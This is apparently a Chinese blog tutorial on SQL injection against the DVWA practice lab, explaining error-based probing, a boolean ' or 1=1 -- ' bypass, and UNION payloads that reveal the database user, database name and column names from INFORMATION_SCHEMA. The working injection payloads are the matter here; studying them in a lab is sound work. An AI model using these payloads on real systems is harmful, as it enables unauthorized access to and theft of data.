owasp SQL 注入-03 (原理)

1: 先看一下注入界面:

点submit 后,可以看到有语法报错,说明已经起作用了:

报如下的错误:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

2:

SQL 注入语句解析:

Mysql>select first_name,last_name from dvwa.users;

Mysql>select first_name,last_name from dvwa.users where user_id='1';

mysql> select first_name,last_name from dvwa.users where user_id='1';

+------------+-----------+

| first_name | last_name |

+------------+-----------+

| admin | admin |

+------------+-----------+

1 row in set (0.00 sec)

2: 下面开始布尔注入:( or 或 and 和 的测试)

点击submit 看结果:

原因是: 先看上面的注入语句:

Mysql>select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- sheng';

看到上面的标绿色的 已经闭环了,后面的 -- 就把后面的所有的 开始认为是 注释内容,不参加反应了。

下面总结一下:

mysql> select first_name,last_name from dvwa.users where user_id=' ' union select user(),database() --'

'> ';

+----------------+-----------+

| first_name | last_name |

+----------------+-----------+

| root@localhost | NULL |

+----------------+-----------+

1 row in set (0.00 sec)

--

这条语句就可以看出是哪个user 来链接数据库的:

'union select user(), database() -- '

注意: 上面的语句-- 后面有空格:

看执行结果:

可以看到是用dvwa 用户来链接数据库的。

下面的SQL 注入的语句如下:

下面是关于字段的 SQL 注入语句:

下面看一下 输出结果:

'union select 1, column_name from INFORMATION_SCHEMA.columns where table_name='users' -- '

下面输出结果:

可以看出后面表的字段,就是这样被SQL 注入得到信息的。

参考文献: 13.SQL注入攻击_哔哩哔哩_bilibili

相关推荐
晋阳十二夜6 小时前
【压力测试之_Jmeter链接Oracle数据库链接】
数据库·oracle·压力测试
GDAL7 小时前
Node.js v22.5+ 官方 SQLite 模块全解析:从入门到实战
数据库·sqlite·node.js
DCTANT8 小时前
【原创】国产化适配-全量迁移MySQL数据到OpenGauss数据库
java·数据库·spring boot·mysql·opengauss
AI、少年郎10 小时前
Oracle 进阶语法实战:从多维分析到数据清洗的深度应用(第四课)
数据库·oracle
赤橙红的黄10 小时前
自定义线程池-实现任务0丢失的处理策略
数据库·spring
DataGear11 小时前
如何在DataGear 5.4.1 中快速制作SQL服务端分页的数据表格看板
javascript·数据库·sql·信息可视化·数据分析·echarts·数据可视化
weixin_4383354011 小时前
分布式锁实现方式:基于Redis的分布式锁实现(Spring Boot + Redis)
数据库·redis·分布式
码不停蹄的玄黓11 小时前
MySQL Undo Log 深度解析:事务回滚与MVCC的核心功臣
数据库·mysql·undo log·回滚日志
Qdgr_11 小时前
价值实证:数字化转型标杆案例深度解析
大数据·数据库·人工智能
数据狐(DataFox)11 小时前
SQL参数化查询:防注入与计划缓存的双重优势
数据库·sql·缓存